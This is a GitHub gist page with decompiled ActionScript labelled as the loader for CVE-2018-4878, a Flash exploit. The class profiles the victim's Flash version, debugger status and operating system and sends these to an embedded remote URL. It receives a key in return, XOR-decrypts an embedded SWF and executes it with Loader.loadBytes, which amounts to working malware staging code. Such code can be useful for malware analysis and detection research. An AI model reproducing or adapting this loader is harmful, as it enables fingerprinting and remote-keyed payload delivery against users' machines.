-
-
Save SkyN9ne/35626a1801512eb1ccadca23c6512010 to your computer and use it in GitHub Desktop.
CVE-2018-4878 ActionScript for pre-decrypted SWF
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package | |
{ | |
import flash.display.Loader; | |
import flash.display.Sprite; | |
import flash.events.Event; | |
import flash.events.IOErrorEvent; | |
import flash.events.SecurityErrorEvent; | |
import flash.net.URLLoader; | |
import flash.net.URLRequest; | |
import flash.system.Capabilities; | |
import flash.text.TextField; | |
import flash.utils.ByteArray; | |
import mx.utils.StringUtil; | |
public class loadswf extends Sprite | |
{ | |
private var SWFBClass:Class; | |
private var MyURL:Class; | |
private var txtfld:TextField; | |
var id_len:uint = 100; | |
var sz_swf_head:uint = 10; | |
var binData:ByteArray; | |
var myUrlReqest:URLRequest; | |
var myUrlLoader:URLLoader; | |
public function loadswf() | |
{ | |
this.SWFBClass = loadswf_SWFBClass; | |
this.MyURL = loadswf_MyURL; | |
this.txtfld = new TextField(); | |
this.myUrlReqest = new URLRequest(); | |
this.myUrlLoader = new URLLoader(); | |
super(); | |
this.txtfld.width = 500; | |
this.txtfld.height = 1000; | |
addChild(this.txtfld); | |
this.myUrlLoader.addEventListener(Event.COMPLETE,this.Decript); | |
this.myUrlLoader.addEventListener(IOErrorEvent.IO_ERROR,this.OnIOErrorHandle); | |
this.myUrlLoader.addEventListener(SecurityErrorEvent.SECURITY_ERROR,this.OnSecurityErrorHandle); | |
this.binData = new this.SWFBClass() as ByteArray; | |
this.SendGetSwfKeyReqest(); | |
} | |
public function SendGetSwfKeyReqest() : void | |
{ | |
var swf_id:ByteArray = new ByteArray(); | |
var strDbg:String = !!Capabilities.isDebugger?"-D":""; | |
var my_url:ByteArray = new this.MyURL() as ByteArray; | |
swf_id.writeBytes(this.binData,this.sz_swf_head,this.id_len); | |
this.myUrlReqest.url = StringUtil.trim(my_url.toString()); | |
this.myUrlReqest.url = this.myUrlReqest.url + ("?id=" + this.Array2String(swf_id)); | |
this.myUrlReqest.url = this.myUrlReqest.url + ("&fp_vs=" + Capabilities.version.replace(",",".") + strDbg); | |
this.myUrlReqest.url = this.myUrlReqest.url + ("&os_vs=" + Capabilities.os); | |
this.myUrlLoader.load(this.myUrlReqest); | |
} | |
private function Array2String(data:ByteArray, split:String = "") : String | |
{ | |
var char:String = null; | |
var res:String = ""; | |
for(var i:int = 0; i < data.length; i++) | |
{ | |
char = data[i].toString(16).toUpperCase(); | |
if(char.length == 1) | |
{ | |
char = "0" + char; | |
} | |
res = res + (char + split); | |
} | |
return res; | |
} | |
public function Decript(event:Event) : void | |
{ | |
var j:int = 0; | |
var loader:URLLoader = URLLoader(event.target); | |
var swf_key_txt:String = loader.data; | |
var decData:ByteArray = new ByteArray(); | |
var swf_key:ByteArray = new ByteArray(); | |
for(var i:int = 0; i < swf_key_txt.length; i = i + 2) | |
{ | |
swf_key.writeByte(uint("0x" + swf_key_txt.substr(i,2))); | |
} | |
decData.writeBytes(this.binData,0,this.sz_swf_head); | |
this.binData.position = this.sz_swf_head + this.id_len; | |
var n:uint = this.binData.readUnsignedInt(); | |
this.binData.position = 0; | |
for(i = this.sz_swf_head + this.id_len + 4; i < this.binData.length; i = i + 100) | |
{ | |
for(j = 0; j < this.id_len; j++) | |
{ | |
decData.writeByte(this.binData[i + j] ^ swf_key[j]); | |
} | |
} | |
var l:Loader = new Loader(); | |
l.loadBytes(decData); | |
addChild(l); | |
} | |
public function OnIOErrorHandle(event:IOErrorEvent) : void | |
{ | |
} | |
public function OnSecurityErrorHandle(event:SecurityErrorEvent) : void | |
{ | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment